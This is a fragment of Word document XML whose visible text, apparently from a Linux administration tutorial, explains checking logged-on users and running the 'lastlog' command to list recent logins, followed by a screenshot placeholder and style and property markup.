    <w:p w14:paraId="59F2FBB7" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>As shown in the preceding screenshot, no users are currently logged on via a console or remotely via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF75D8" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>We can also get a list of users of have recently logged in to the system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B48BB8E" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050197D" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>lastlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BEEC79F" w14:textId="06236EAC" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C91CE98" wp14:editId="33E227F3">
            <wp:extent cx="5943600" cy="4084320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1666634867" name="Picture 12"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ontent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084320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF8836" w14:textId="77777777" w:rsidR="008269DF" w:rsidRDefault="008269DF"/>
    <w:sectPr w:rsidR="008269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2A2"/>
    <w:rsid w:val="003812A2"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006512F9"/>
    <w:rsid w:val="008269DF"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00C568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71478"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{114408D6-71E2-4088-9B5E-CC59614FE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2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12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12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12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12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12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2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2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2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2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12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12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12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12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12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2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2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2A2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00381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2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2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2A2"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003812A2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003812A2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003812A2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003812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12A2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003812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fontTable" Target="fontTable.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479</Words>
  <Characters>2366</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>80</Lines>
  <Paragraphs>53</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-19T13:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-19T13:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>